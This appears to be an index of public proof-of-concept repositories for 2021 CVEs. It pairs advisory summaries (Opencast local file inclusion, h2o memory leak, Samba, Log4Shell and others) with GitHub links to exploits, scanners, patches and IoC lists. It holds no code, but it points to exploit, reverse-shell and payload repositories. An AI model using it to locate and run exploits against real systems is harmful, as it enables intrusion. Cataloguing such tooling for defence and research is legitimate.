Opencast is an Open Source Lecture Capture & Video Management system for Education. Opencast before version 9.10 or 10.6 allows references to local file URLs in ingested media packages, allowing attackers to include local files from Opencast's host machines and making them available via the web interface. Before Opencast 9.10 and 10.6, Opencast would open and include local files during ingests. Attackers could exploit this to include most local files the process has read access to, extracting secrets from the host machine. An attacker would need to have the privileges required to add new media to exploit this, but these are often widely given. The issue has been fixed in Opencast 10.6 and 11.0. You can mitigate this issue by narrowing down the read access Opencast has to files on the file system using UNIX permissions or mandatory access control systems like SELinux. This cannot prevent access to files Opencast needs to read, though, and we highly recommend updating.

- [Jackey0/opencast-CVE-2021-43821-env](https://github.com/Jackey0/opencast-CVE-2021-43821-env)

### CVE-2021-43848 (2022-02-01)

h2o is an open source HTTP server. In code prior to the `8c0eca3` commit h2o may attempt to access uninitialized memory. When receiving QUIC frames in a certain order, the HTTP/3 server-side implementation of h2o can be misguided to treat uninitialized memory as HTTP/3 frames that have been received. When h2o is used as a reverse proxy, an attacker can abuse this vulnerability to send internal state of h2o to backend servers controlled by the attacker or a third party. Also, if there is an HTTP endpoint that reflects the traffic sent from the client, an attacker can use that reflector to obtain internal state of h2o. This internal state includes traffic of other connections in unencrypted form and TLS session tickets. This vulnerability exists in h2o server with HTTP/3 support, between commit 93af138 and d1f0f65. None of the released versions of h2o are affected by this vulnerability. There are no known workarounds. Users of unreleased versions of h2o using HTTP/3 are advised to upgrade immediately.

- [neex/hui2ochko](https://github.com/neex/hui2ochko)

### CVE-2021-43857 (2021-12-27)

Gerapy is a distributed crawler management framework. Gerapy prior to version 0.9.8 is vulnerable to remote code execution, and this issue is patched in version 0.9.8.

- [lowkey0808/CVE-2021-43857](https://github.com/lowkey0808/CVE-2021-43857)

### CVE-2021-43858 (2021-12-27)

MinIO is a Kubernetes native application for cloud storage. Prior to version `RELEASE.2021-12-27T07-23-18Z`, a malicious client can hand-craft an HTTP API call that allows for updating policy for a user and gaining higher privileges. The patch in version `RELEASE.2021-12-27T07-23-18Z` changes the accepted request body type and removes the ability to apply policy changes through this API. There is a workaround for this vulnerability: Changing passwords can be disabled by adding an explicit `Deny` rule to disable the API for users.

- [khuntor/CVE-2021-43858-MinIO](https://github.com/khuntor/CVE-2021-43858-MinIO)

### CVE-2021-43883 (2021-12-15)

Windows Installer Elevation of Privilege Vulnerability

- [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff)

### CVE-2021-43891 (2021-12-15)

Visual Studio Code Remote Code Execution Vulnerability

- [parsiya/code-wsl-rce](https://github.com/parsiya/code-wsl-rce)

### CVE-2021-43893 (2021-12-15)

Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability

- [jbaines-r7/blankspace](https://github.com/jbaines-r7/blankspace)

### CVE-2021-43908 (2021-12-15)

Visual Studio Code Spoofing Vulnerability

- [Sudistark/vscode-rce-electrovolt](https://github.com/Sudistark/vscode-rce-electrovolt)

### CVE-2021-43936 (2021-12-06)

The software allows the attacker to upload or transfer files of dangerous types to the WebHMI portal, that may be automatically processed within the product's environment or lead to arbitrary code execution.

- [LongWayHomie/CVE-2021-43936](https://github.com/LongWayHomie/CVE-2021-43936)

### CVE-2021-44026 (2021-11-19)

Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to a potential SQL injection via search or search_params.

- [pentesttoolscom/roundcube-cve-2021-44026](https://github.com/pentesttoolscom/roundcube-cve-2021-44026)

### CVE-2021-44077 (2021-11-29)

Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.

- [horizon3ai/CVE-2021-44077](https://github.com/horizon3ai/CVE-2021-44077)
- [pizza-power/Golang-CVE-2021-44077-POC](https://github.com/pizza-power/Golang-CVE-2021-44077-POC)

### CVE-2021-44103
- [paulotrindadec/CVE-2021-44103](https://github.com/paulotrindadec/CVE-2021-44103)

### CVE-2021-44117 (2022-06-10)

A Cross Site Request Forgery (CSRF) vulnerability exists in TheDayLightStudio Fuel CMS 1.5.0 via a POST call to /fuel/sitevariables/delete/4.

- [warmachine-57/CVE-2021-44117](https://github.com/warmachine-57/CVE-2021-44117)

### CVE-2021-44132 (2022-02-25)

A command injection vulnerability in the function formImportOMCIShell of C-DATA ONU4FERW V2.1.13_X139 allows attackers to execute arbitrary commands via a crafted file.

- [exploitwritter/CVE-2021-44132](https://github.com/exploitwritter/CVE-2021-44132)

### CVE-2021-44142 (2022-02-21)

The Samba vfs_fruit module uses extended file attributes (EA, xattr) to provide "...enhanced compatibility with Apple SMB clients and interoperability with a Netatalk 3 AFP fileserver." Samba versions prior to 4.13.17, 4.14.12 and 4.15.5 with vfs_fruit configured allow out-of-bounds heap read and write via specially crafted extended file attributes. A remote attacker with write access to extended file attributes can execute arbitrary code with the privileges of smbd, typically root.

- [hrsman/Samba-CVE-2021-44142](https://github.com/hrsman/Samba-CVE-2021-44142)
- [horizon3ai/CVE-2021-44142](https://github.com/horizon3ai/CVE-2021-44142)
- [gudyrmik/CVE-2021-44142](https://github.com/gudyrmik/CVE-2021-44142)

### CVE-2021-44168 (2022-01-04)

A download of code without integrity check vulnerability in the "execute restore src-vis" command of FortiOS before 7.0.3 may allow a local authenticated attacker to download arbitrary files on the device via specially crafted update packages.

- [0xhaggis/CVE-2021-44168](https://github.com/0xhaggis/CVE-2021-44168)

### CVE-2021-44217 (2022-01-18)

In Ericsson CodeChecker through 6.18.0, a Stored Cross-site scripting (XSS) vulnerability in the comments component of the reports viewer allows remote attackers to inject arbitrary web script or HTML via the POST JSON data of the /CodeCheckerService API.

- [Hyperkopite/CVE-2021-44217](https://github.com/Hyperkopite/CVE-2021-44217)

### CVE-2021-44228 (2021-12-10)

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

- [tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce)
- [Glease/Healer](https://github.com/Glease/Healer)
- [jacobtread/L4J-Vuln-Patch](https://github.com/jacobtread/L4J-Vuln-Patch)
- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)
- [HyCraftHD/Log4J-RCE-Proof-Of-Concept](https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept)
- [boundaryx/cloudrasp-log4j2](https://github.com/boundaryx/cloudrasp-log4j2)
- [dbgee/CVE-2021-44228](https://github.com/dbgee/CVE-2021-44228)
- [CreeperHost/Log4jPatcher](https://github.com/CreeperHost/Log4jPatcher)
- [DragonSurvivalEU/RCE](https://github.com/DragonSurvivalEU/RCE)
- [simonis/Log4jPatch](https://github.com/simonis/Log4jPatch)
- [zlepper/CVE-2021-44228-Test-Server](https://github.com/zlepper/CVE-2021-44228-Test-Server)
- [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app)
- [NorthwaveSecurity/log4jcheck](https://github.com/NorthwaveSecurity/log4jcheck)
- [nkoneko/VictimApp](https://github.com/nkoneko/VictimApp)
- [lhotari/pulsar-docker-images-patch-CVE-2021-44228](https://github.com/lhotari/pulsar-docker-images-patch-CVE-2021-44228)
- [1in9e/Apache-Log4j2-RCE](https://github.com/1in9e/Apache-Log4j2-RCE)
- [KosmX/CVE-2021-44228-example](https://github.com/KosmX/CVE-2021-44228-example)
- [greymd/CVE-2021-44228](https://github.com/greymd/CVE-2021-44228)
- [mubix/CVE-2021-44228-Log4Shell-Hashes](https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes)
- [OopsieWoopsie/mc-log4j-patcher](https://github.com/OopsieWoopsie/mc-log4j-patcher)
- [wheez-y/CVE-2021-44228-kusto](https://github.com/wheez-y/CVE-2021-44228-kusto)
- [izzyacademy/log4shell-mitigation](https://github.com/izzyacademy/log4shell-mitigation)
- [Kadantte/CVE-2021-44228-poc](https://github.com/Kadantte/CVE-2021-44228-poc)
- [takito1812/log4j-detect](https://github.com/takito1812/log4j-detect)
- [winnpixie/log4noshell](https://github.com/winnpixie/log4noshell)
- [Azeemering/CVE-2021-44228-DFIR-Notes](https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes)
- [Puliczek/CVE-2021-44228-PoC-log4j-bypass-words](https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words)
- [kozmer/log4j-shell-poc](https://github.com/kozmer/log4j-shell-poc)
- [alexandreroman/cve-2021-44228-workaround-buildpack](https://github.com/alexandreroman/cve-2021-44228-workaround-buildpack)
- [Adikso/minecraft-log4j-honeypot](https://github.com/Adikso/minecraft-log4j-honeypot)
- [racoon-rac/CVE-2021-44228](https://github.com/racoon-rac/CVE-2021-44228)
- [TheArqsz/CVE-2021-44228-PoC](https://github.com/TheArqsz/CVE-2021-44228-PoC)
- [1lann/log4shelldetect](https://github.com/1lann/log4shelldetect)
- [binganao/Log4j2-RCE](https://github.com/binganao/Log4j2-RCE)
- [phoswald/sample-ldap-exploit](https://github.com/phoswald/sample-ldap-exploit)
- [rakutentech/jndi-ldap-test-server](https://github.com/rakutentech/jndi-ldap-test-server)
- [uint0/cve-2021-44228--spring-hibernate](https://github.com/uint0/cve-2021-44228--spring-hibernate)
- [saharNooby/log4j-vulnerability-patcher-agent](https://github.com/saharNooby/log4j-vulnerability-patcher-agent)
- [f0ng/log4j2burpscanner](https://github.com/f0ng/log4j2burpscanner)
- [M1ngGod/CVE-2021-44228-Log4j-lookup-Rce](https://github.com/M1ngGod/CVE-2021-44228-Log4j-lookup-Rce)
- [byteboycn/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/byteboycn/CVE-2021-44228-Apache-Log4j-Rce)
- [lhotari/log4shell-mitigation-tester](https://github.com/lhotari/log4shell-mitigation-tester)
- [toramanemre/log4j-rce-detect-waf-bypass](https://github.com/toramanemre/log4j-rce-detect-waf-bypass)
- [logpresso/CVE-2021-44228-Scanner](https://github.com/logpresso/CVE-2021-44228-Scanner)
- [vorburger/Log4j_CVE-2021-44228](https://github.com/vorburger/Log4j_CVE-2021-44228)
- [gauthamg/log4j2021_vul_test](https://github.com/gauthamg/log4j2021_vul_test)
- [b-abderrahmane/CVE-2021-44228-playground](https://github.com/b-abderrahmane/CVE-2021-44228-playground)
- [leetxyz/CVE-2021-44228-Advisories](https://github.com/leetxyz/CVE-2021-44228-Advisories)
- [cado-security/log4shell](https://github.com/cado-security/log4shell)
- [WYSIIWYG/Log4J_0day_RCE](https://github.com/WYSIIWYG/Log4J_0day_RCE)
- [mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform](https://github.com/mkhazamipour/log4j-vulnerable-app-cve-2021-44228-terraform)
- [Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs](https://github.com/Sh0ckFR/log4j-CVE-2021-44228-Public-IoCs)
- [zzzz0317/log4j2-vulnerable-spring-app](https://github.com/zzzz0317/log4j2-vulnerable-spring-app)
- [datadavev/test-44228](https://github.com/datadavev/test-44228)
- [LemonCraftRu/JndiRemover](https://github.com/LemonCraftRu/JndiRemover)
- [zhangxvx/Log4j-Rec-CVE-2021-44228](https://github.com/zhangxvx/Log4j-Rec-CVE-2021-44228)
- [darkarnium/Log4j-CVE-Detect](https://github.com/darkarnium/Log4j-CVE-Detect)
- [chilliwebs/CVE-2021-44228_Example](https://github.com/chilliwebs/CVE-2021-44228_Example)
- [irgoncalves/f5-waf-enforce-sig-CVE-2021-44228](https://github.com/irgoncalves/f5-waf-enforce-sig-CVE-2021-44228)
- [jeffbryner/log4j-docker-vaccine](https://github.com/jeffbryner/log4j-docker-vaccine)
- [mergebase/log4j-detector](https://github.com/mergebase/log4j-detector)
- [unlimitedsola/log4j2-rce-poc](https://github.com/unlimitedsola/log4j2-rce-poc)
- [Jeromeyoung/log4j2burpscanner](https://github.com/Jeromeyoung/log4j2burpscanner)
- [corretto/hotpatch-for-apache-log4j2](https://github.com/corretto/hotpatch-for-apache-log4j2)
- [alexandre-lavoie/python-log4rce](https://github.com/alexandre-lavoie/python-log4rce)
- [RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs](https://github.com/RedDrip7/Log4Shell_CVE-2021-44228_related_attacks_IOCs)
- [mzlogin/CVE-2021-44228-Demo](https://github.com/mzlogin/CVE-2021-44228-Demo)
- [blake-fm/vcenter-log4j](https://github.com/blake-fm/vcenter-log4j)
- [creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review](https://github.com/creamIcec/CVE-2021-44228-Apache-Log4j-Rce__review)
- [uint0/cve-2021-44228-helpers](https://github.com/uint0/cve-2021-44228-helpers)
- [RK800-DEV/apache-log4j-poc](https://github.com/RK800-DEV/apache-log4j-poc)
- [sud0x00/log4j-CVE-2021-44228](https://github.com/sud0x00/log4j-CVE-2021-44228)
- [DiCanio/CVE-2021-44228-docker-example](https://github.com/DiCanio/CVE-2021-44228-docker-example)
- [myyxl/cve-2021-44228-minecraft-poc](https://github.com/myyxl/cve-2021-44228-minecraft-poc)
- [RrUZi/Awesome-CVE-2021-44228](https://github.com/RrUZi/Awesome-CVE-2021-44228)
- [future-client/CVE-2021-44228](https://github.com/future-client/CVE-2021-44228)
- [CodeShield-Security/Log4JShell-Bytecode-Detector](https://github.com/CodeShield-Security/Log4JShell-Bytecode-Detector)
- [Crane-Mocker/log4j-poc](https://github.com/Crane-Mocker/log4j-poc)
- [dtact/divd-2021-00038--log4j-scanner](https://github.com/dtact/divd-2021-00038--log4j-scanner)
- [kali-dass/CVE-2021-44228-log4Shell](https://github.com/kali-dass/CVE-2021-44228-log4Shell)
- [pravin-pp/log4j2-CVE-2021-44228](https://github.com/pravin-pp/log4j2-CVE-2021-44228)
- [Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228](https://github.com/Malwar3Ninja/Exploitation-of-Log4j2-CVE-2021-44228)
- [urholaukkarinen/docker-log4shell](https://github.com/urholaukkarinen/docker-log4shell)
- [ssl/scan4log4j](https://github.com/ssl/scan4log4j)
- [infiniroot/nginx-mitigate-log4shell](https://github.com/infiniroot/nginx-mitigate-log4shell)
- [lohanichaten/log4j-cve-2021-44228](https://github.com/lohanichaten/log4j-cve-2021-44228)
- [authomize/log4j-log4shell-affected](https://github.com/authomize/log4j-log4shell-affected)
- [guardicode/CVE-2021-44228_IoCs](https://github.com/guardicode/CVE-2021-44228_IoCs)
- [fireflyingup/log4j-poc](https://github.com/fireflyingup/log4j-poc)
- [qingtengyun/cve-2021-44228-qingteng-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-patch)
- [nccgroup/log4j-jndi-be-gone](https://github.com/nccgroup/log4j-jndi-be-gone)
- [qingtengyun/cve-2021-44228-qingteng-online-patch](https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch)
- [tasooshi/horrors-log4shell](https://github.com/tasooshi/horrors-log4shell)
- [Hydragyrum/evil-rmi-server](https://github.com/Hydragyrum/evil-rmi-server)
- [twseptian/spring-boot-log4j-cve-2021-44228-docker-lab](https://github.com/twseptian/spring-boot-log4j-cve-2021-44228-docker-lab)
- [OlafHaalstra/log4jcheck](https://github.com/OlafHaalstra/log4jcheck)
- [Panyaprach/Prove-CVE-2021-44228](https://github.com/Panyaprach/Prove-CVE-2021-44228)
- [momos1337/Log4j-RCE](https://github.com/momos1337/Log4j-RCE)
- [palominoinc/cve-2021-44228-log4j-mitigation](https://github.com/palominoinc/cve-2021-44228-log4j-mitigation)
- [cyberxml/log4j-poc](https://github.com/cyberxml/log4j-poc)
- [corneacristian/Log4J-CVE-2021-44228-RCE](https://github.com/corneacristian/Log4J-CVE-2021-44228-RCE)
- [Diverto/nse-log4shell](https://github.com/Diverto/nse-log4shell)
- [dotPY-hax/log4py](https://github.com/dotPY-hax/log4py)
- [sunnyvale-it/CVE-2021-44228-PoC](https://github.com/sunnyvale-it/CVE-2021-44228-PoC)
- [maxant/log4j2-CVE-2021-44228](https://github.com/maxant/log4j2-CVE-2021-44228)
- [atnetws/fail2ban-log4j](https://github.com/atnetws/fail2ban-log4j)
- [kimobu/cve-2021-44228](https://github.com/kimobu/cve-2021-44228)
- [ph0lk3r/anti-jndi](https://github.com/ph0lk3r/anti-jndi)
- [bigsizeme/Log4j-check](https://github.com/bigsizeme/Log4j-check)
- [pedrohavay/exploit-CVE-2021-44228](https://github.com/pedrohavay/exploit-CVE-2021-44228)
- [0xRyan/log4j-nullroute](https://github.com/0xRyan/log4j-nullroute)
- [fireeye/CVE-2021-44228](https://github.com/fireeye/CVE-2021-44228)
- [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan)
- [rubo77/log4j_checker_beta](https://github.com/rubo77/log4j_checker_beta)
- [thecyberneh/Log4j-RCE-Exploiter](https://github.com/thecyberneh/Log4j-RCE-Exploiter)
- [halibobor/log4j2](https://github.com/halibobor/log4j2)
- [sourcegraph/log4j-cve-code-search-resources](https://github.com/sourcegraph/log4j-cve-code-search-resources)
- [thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832](https://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105--CVE-2021-44832)
- [helsecert/CVE-2021-44228](https://github.com/helsecert/CVE-2021-44228)
- [markuman/aws-log4j-mitigations](https://github.com/markuman/aws-log4j-mitigations)
- [tuyenee/Log4shell](https://github.com/tuyenee/Log4shell)
- [JiuBanSec/Log4j-CVE-2021-44228](https://github.com/JiuBanSec/Log4j-CVE-2021-44228)
- [ycdxsb/Log4Shell-CVE-2021-44228-ENV](https://github.com/ycdxsb/Log4Shell-CVE-2021-44228-ENV)
- [avwolferen/Sitecore.Solr-log4j-mitigation](https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation)
- [kek-Sec/log4j-scanner-CVE-2021-44228](https://github.com/kek-Sec/log4j-scanner-CVE-2021-44228)
- [Camphul/log4shell-spring-framework-research](https://github.com/Camphul/log4shell-spring-framework-research)
- [lov3r/cve-2021-44228-log4j-exploits](https://github.com/lov3r/cve-2021-44228-log4j-exploits)
- [sinakeshmiri/log4jScan](https://github.com/sinakeshmiri/log4jScan)
- [0xDexter0us/Log4J-Scanner](https://github.com/0xDexter0us/Log4J-Scanner)
- [LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228](https://github.com/LutziGoz/Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228)
- [0xsyr0/Log4Shell](https://github.com/0xsyr0/Log4Shell)
- [1hakusai1/log4j-rce-CVE-2021-44228](https://github.com/1hakusai1/log4j-rce-CVE-2021-44228)
- [jeffli1024/log4j-rce-test](https://github.com/jeffli1024/log4j-rce-test)
- [zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service](https://github.com/zsolt-halo/Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service)
- [manuel-alvarez-alvarez/log4j-cve-2021-44228](https://github.com/manuel-alvarez-alvarez/log4j-cve-2021-44228)
- [VNYui/CVE-2021-44228](https://github.com/VNYui/CVE-2021-44228)
- [flxhaas/Scan-CVE-2021-44228](https://github.com/flxhaas/Scan-CVE-2021-44228)
- [justakazh/Log4j-CVE-2021-44228](https://github.com/justakazh/Log4j-CVE-2021-44228)
- [irgoncalves/f5-waf-quick-patch-cve-2021-44228](https://github.com/irgoncalves/f5-waf-quick-patch-cve-2021-44228)
- [madCdan/JndiLookup](https://github.com/madCdan/JndiLookup)
- [Koupah/MC-Log4j-Patcher](https://github.com/Koupah/MC-Log4j-Patcher)
- [AlexandreHeroux/Fix-CVE-2021-44228](https://github.com/AlexandreHeroux/Fix-CVE-2021-44228)
- [kossatzd/log4j-CVE-2021-44228-test](https://github.com/kossatzd/log4j-CVE-2021-44228-test)
- [tobiasoed/log4j-CVE-2021-44228](https://github.com/tobiasoed/log4j-CVE-2021-44228)
- [hackinghippo/log4shell_ioc_ips](https://github.com/hackinghippo/log4shell_ioc_ips)
- [p3dr16k/log4j-1.2.15-mod](https://github.com/p3dr16k/log4j-1.2.15-mod)
- [claranet/ansible-role-log4shell](https://github.com/claranet/ansible-role-log4shell)
- [taurusxin/CVE-2021-44228](https://github.com/taurusxin/CVE-2021-44228)
- [corelight/cve-2021-44228](https://github.com/corelight/cve-2021-44228)
- [rodfer0x80/log4j2-prosecutor](https://github.com/rodfer0x80/log4j2-prosecutor)
- [yanghaoi/CVE-2021-44228_Log4Shell](https://github.com/yanghaoi/CVE-2021-44228_Log4Shell)
- [lfama/log4j_checker](https://github.com/lfama/log4j_checker)
- [threatmonit/Log4j-IOCs](https://github.com/threatmonit/Log4j-IOCs)
- [ben-smash/l4j-info](https://github.com/ben-smash/l4j-info)
- [strawhatasif/log4j-test](https://github.com/strawhatasif/log4j-test)
- [giterlizzi/nmap-log4shell](https://github.com/giterlizzi/nmap-log4shell)
- [tica506/Siem-queries-for-CVE-2021-44228](https://github.com/tica506/Siem-queries-for-CVE-2021-44228)
- [chilit-nl/log4shell-example](https://github.com/chilit-nl/log4shell-example)
- [Occamsec/log4j-checker](https://github.com/Occamsec/log4j-checker)
- [snatalius/log4j2-CVE-2021-44228-poc-local](https://github.com/snatalius/log4j2-CVE-2021-44228-poc-local)
- [Contrast-Security-OSS/CVE-2021-44228](https://github.com/Contrast-Security-OSS/CVE-2021-44228)
- [back2root/log4shell-rex](https://github.com/back2root/log4shell-rex)
- [alexbakker/log4shell-tools](https://github.com/alexbakker/log4shell-tools)
- [perryflynn/find-log4j](https://github.com/perryflynn/find-log4j)
- [alpacamybags118/log4j-cve-2021-44228-sample](https://github.com/alpacamybags118/log4j-cve-2021-44228-sample)
- [sandarenu/log4j2-issue-check](https://github.com/sandarenu/log4j2-issue-check)
- [roticagas/CVE-2021-44228-Demo](https://github.com/roticagas/CVE-2021-44228-Demo)
- [Woahd/log4j-urlscanner](https://github.com/Woahd/log4j-urlscanner)
- [faisalfs10x/Log4j2-CVE-2021-44228-revshell](https://github.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell)
- [gcmurphy/chk_log4j](https://github.com/gcmurphy/chk_log4j)
- [0xInfection/LogMePwn](https://github.com/0xInfection/LogMePwn)
- [toramanemre/apache-solr-log4j-CVE-2021-44228](https://github.com/toramanemre/apache-solr-log4j-CVE-2021-44228)
- [codiobert/log4j-scanner](https://github.com/codiobert/log4j-scanner)
- [cbuschka/log4j2-rce-recap](https://github.com/cbuschka/log4j2-rce-recap)
- [andrii-kovalenko-celonis/log4j-vulnerability-demo](https://github.com/andrii-kovalenko-celonis/log4j-vulnerability-demo)
- [dark-ninja10/Log4j-CVE-2021-44228](https://github.com/dark-ninja10/Log4j-CVE-2021-44228)
- [fox-it/log4j-finder](https://github.com/fox-it/log4j-finder)
- [34zY/JNDI-Exploit-1.2-log4shell](https://github.com/34zY/JNDI-Exploit-1.2-log4shell)
- [didoatanasov/cve-2021-44228](https://github.com/didoatanasov/cve-2021-44228)
- [ReynerGonzalez/Security-Log4J-Tester](https://github.com/ReynerGonzalez/Security-Log4J-Tester)
- [ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228](https://github.com/ShaneKingBlog/org.shaneking.demo.cve.y2021.s44228)
- [wortell/log4j](https://github.com/wortell/log4j)
- [municipalparkingservices/CVE-2021-44228-Scanner](https://github.com/municipalparkingservices/CVE-2021-44228-Scanner)
- [BinaryDefense/log4j-honeypot-flask](https://github.com/BinaryDefense/log4j-honeypot-flask)
- [MalwareTech/Log4jTools](https://github.com/MalwareTech/Log4jTools)
- [mufeedvh/log4jail](https://github.com/mufeedvh/log4jail)
- [guerzon/log4shellpoc](https://github.com/guerzon/log4shellpoc)
- [ab0x90/CVE-2021-44228_PoC](https://github.com/ab0x90/CVE-2021-44228_PoC)
- [stripe/log4j-remediation-tools](https://github.com/stripe/log4j-remediation-tools)
- [xsultan/log4jshield](https://github.com/xsultan/log4jshield)
- [HynekPetrak/log4shell-finder](https://github.com/HynekPetrak/log4shell-finder)
- [0xThiebaut/CVE-2021-44228](https://github.com/0xThiebaut/CVE-2021-44228)
- [CERTCC/CVE-2021-44228_scanner](https://github.com/CERTCC/CVE-2021-44228_scanner)
- [CrackerCat/CVE-2021-44228-Log4j-Payloads](https://github.com/CrackerCat/CVE-2021-44228-Log4j-Payloads)
- [dbzoo/log4j_scanner](https://github.com/dbzoo/log4j_scanner)
- [jeremyrsellars/CVE-2021-44228_scanner](https://github.com/jeremyrsellars/CVE-2021-44228_scanner)
- [JustinDPerkins/C1-WS-LOG4SHELL](https://github.com/JustinDPerkins/C1-WS-LOG4SHELL)
- [VinniMarcon/Log4j-Updater](https://github.com/VinniMarcon/Log4j-Updater)
- [bhprin/log4j-vul](https://github.com/bhprin/log4j-vul)
- [avirahul007/CVE-2021-44228](https://github.com/avirahul007/CVE-2021-44228)
- [rgl/log4j-log4shell-playground](https://github.com/rgl/log4j-log4shell-playground)
- [anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228](https://github.com/anuvindhs/how-to-check-patch-secure-log4j-CVE-2021-44228)
- [KeysAU/Get-log4j-Windows.ps1](https://github.com/KeysAU/Get-log4j-Windows.ps1)
- [kubearmor/log4j-CVE-2021-44228](https://github.com/kubearmor/log4j-CVE-2021-44228)
- [jyotisahu98/logpresso-CVE-2021-44228-Scanner](https://github.com/jyotisahu98/logpresso-CVE-2021-44228-Scanner)
- [gitlab-de/log4j-resources](https://github.com/gitlab-de/log4j-resources)
- [redhuntlabs/Log4JHunt](https://github.com/redhuntlabs/Log4JHunt)
- [mss/log4shell-hotfix-side-effect](https://github.com/mss/log4shell-hotfix-side-effect)
- [MeterianHQ/log4j-vuln-coverage-check](https://github.com/MeterianHQ/log4j-vuln-coverage-check)
- [sebiboga/jmeter-fix-cve-2021-44228-windows](https://github.com/sebiboga/jmeter-fix-cve-2021-44228-windows)
- [mitiga/log4shell-cloud-scanner](https://github.com/mitiga/log4shell-cloud-scanner)
- [isuruwa/Log4j](https://github.com/isuruwa/Log4j)
- [honeynet/log4shell-data](https://github.com/honeynet/log4shell-data)
- [inettgmbh/checkmk-log4j-scanner](https://github.com/inettgmbh/checkmk-log4j-scanner)
- [b1tm0n3r/CVE-2021-44228](https://github.com/b1tm0n3r/CVE-2021-44228)
- [VerveIndustrialProtection/CVE-2021-44228-Log4j](https://github.com/VerveIndustrialProtection/CVE-2021-44228-Log4j)
- [alenazi90/log4j](https://github.com/alenazi90/log4j)
- [pmontesd/log4j-cve-2021-44228](https://github.com/pmontesd/log4j-cve-2021-44228)
- [LiveOverflow/log4shell](https://github.com/LiveOverflow/log4shell)
- [aws-samples/kubernetes-log4j-cve-2021-44228-node-agent](https://github.com/aws-samples/kubernetes-log4j-cve-2021-44228-node-agent)
- [michaelsanford/Log4Shell-Honeypot](https://github.com/michaelsanford/Log4Shell-Honeypot)
- [thomaspatzke/Log4Pot](https://github.com/thomaspatzke/Log4Pot)
- [ubitech/cve-2021-44228-rce-poc](https://github.com/ubitech/cve-2021-44228-rce-poc)
- [rv4l3r3/log4v-vuln-check](https://github.com/rv4l3r3/log4v-vuln-check)
- [dpomnean/log4j_scanner_wrapper](https://github.com/dpomnean/log4j_scanner_wrapper)
- [roxas-tan/CVE-2021-44228](https://github.com/roxas-tan/CVE-2021-44228)
- [shamo0/CVE-2021-44228](https://github.com/shamo0/CVE-2021-44228)
- [snow0715/log4j-Scan-Burpsuite](https://github.com/snow0715/log4j-Scan-Burpsuite)
- [Joefreedy/Log4j-Windows-Scanner](https://github.com/Joefreedy/Log4j-Windows-Scanner)
- [Nanitor/log4fix](https://github.com/Nanitor/log4fix)
- [Gyrfalc0n/scanlist-log4j](https://github.com/Gyrfalc0n/scanlist-log4j)
- [korteke/log4shell-demo](https://github.com/korteke/log4shell-demo)
- [recanavar/vuln_spring_log4j2](https://github.com/recanavar/vuln_spring_log4j2)
- [DXC-StrikeForce/Burp-Log4j-HammerTime](https://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime)
- [andalik/log4j-filescan](https://github.com/andalik/log4j-filescan)
- [lonecloud/CVE-2021-44228-Apache-Log4j](https://github.com/lonecloud/CVE-2021-44228-Apache-Log4j)
- [gyaansastra/CVE-2021-44228](https://github.com/gyaansastra/CVE-2021-44228)
- [axisops/CVE-2021-44228](https://github.com/axisops/CVE-2021-44228)
- [kal1gh0st/MyLog4Shell](https://github.com/kal1gh0st/MyLog4Shell)
- [hozyx/log4shell](https://github.com/hozyx/log4shell)
- [andypitcher/Log4J_checker](https://github.com/andypitcher/Log4J_checker)
- [Vulnmachines/log4j-cve-2021-44228](https://github.com/Vulnmachines/log4j-cve-2021-44228)
- [kannthu/CVE-2021-44228-Apache-Log4j-Rce](https://github.com/kannthu/CVE-2021-44228-Apache-Log4j-Rce)
- [Kr0ff/CVE-2021-44228](https://github.com/Kr0ff/CVE-2021-44228)
- [suuhm/log4shell4shell](https://github.com/suuhm/log4shell4shell)
- [wajda/log4shell-test-exploit](https://github.com/wajda/log4shell-test-exploit)
- [obscuritylabs/log4shell-poc-lab](https://github.com/obscuritylabs/log4shell-poc-lab)
- [Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228](https://github.com/Fazmin/vCenter-Server-Workaround-Script-CVE-2021-44228)
